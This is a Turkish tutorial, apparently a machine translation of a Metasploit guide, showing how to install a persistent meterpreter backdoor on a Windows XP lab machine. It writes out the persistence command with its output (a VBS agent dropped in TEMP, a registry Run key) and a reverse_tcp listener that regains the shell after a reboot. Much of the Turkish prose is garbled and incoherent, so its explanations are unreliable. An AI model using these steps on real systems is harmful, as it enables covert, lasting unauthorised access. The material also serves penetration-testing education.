Kalıcılık.rb
Hedef kayıt defterini açtıktan sonra kalıcılık sağlamak için Metasploit Framework içinde kullanabileceğiniz bir diğer yöntem de persistence.rb komut dosyasını kullanmaktır.
Bu yöntem sayesinde, hedef bilgisayar güncellense bile tekrar bağlanma imkanınız bulunmaktadır. Ayrıca hedef sistemin tekrar onarılması da etkilenmeyecektir.
Bir önceki konuda, metsvc uyarımızı burada da tekrarlayalım. persistence.rb arka kapı, bağlantı için herhangi bir oturum açma bilgisini kullanmaz. Bu açıklığı keşfedip herkesin yolunu sağlayabilir.
Hedef sistem ölçüm cihazı girişi açıldıktan sonra persistence.rb komut dosyası kullanmadan önce yardım birleştirmeyi görüntüle ve bize hangi seçeneklerin gösterildiğini görelim.
meterpreter > run persistence -h [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] Meterpreter Script for creating a persistent backdoor on a target host. OPTIONS: -A Automatically start a matching exploit/multi/handler to connect to the agent -L Location in target host to write payload to, if none %TEMP% will be used. -P Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on which the system running Metasploit is listening -r The IP of the system running Metasploit listening for the connect back Aşağıdaki persistence -U -i 5 -p 443 -r 192.168.1.71 kesme işlemleri hangi işlemleri yapıyor?
-U, bir kullanıcı kaydının açılmasında bilgisayarımızın otomatik bağlantı biriminin korunmasını sağlar.
-i 5 Karşe persistence.rb kodu kodu her 5 birimlik bir bize bağlanmaya çalışır.
-p 443 bizim dinleme yapan bilgisayarımızın dinleme yaptığı port numarasıdır.
-r 192.168.1.71 bizim dinlemeyi yapan bilgisayarımızın IP numarasıdır.
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.71 [*] Creating a persistent agent: LHOST=192.168.1.71 LPORT=443 (interval=5 onboot=true) [*] Persistent agent script is 613976 bytes long [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs [*] Agent executed with PID 492 [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr [*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc meterpreter > Verdiğimiz komut sonucunda devam eden komut dosyası, çıktılarda da görüleceği gibi işlem tamamlandığında günlük temizleme işleminin nasıl yapılabileceğini gösteriyor.
multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc Komut dosyasının çalıştırılmadığını ve otomatik bağlantının değiştirilmediğini, hedef bilgisayarı tekrar başlatarak anlayabiliriz. Hedef bilgisayarı yeniden başlatalım.
meterpreter > reboot Rebooting... meterpreter > exit [*] Meterpreter session 3 closed. Reason: User exit Dinleyici exploit/multi/handler modülünü tekrar başlatalım.
msf exploit(ms08_067_netapi) > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.71 LHOST => 192.168.1.71 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.71:443 [*] Starting the payload handler... Hedef bilgisayar tekrar başladığında, oturum açmaz yerel bilgisayar bilgisayarında kayıtlı olduğu gibi tekrar kaydedilir.
[*] Sending stage (748544 bytes) to 192.168.1.161 [*] Meterpreter session 5 opened (192.168.1.71:443 -> 192.168.1.161:1045) at 2010-08-21 12:31:42 -0600 meterpreter > sysinfo Computer: XEN-XP-SP2-BARE OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter >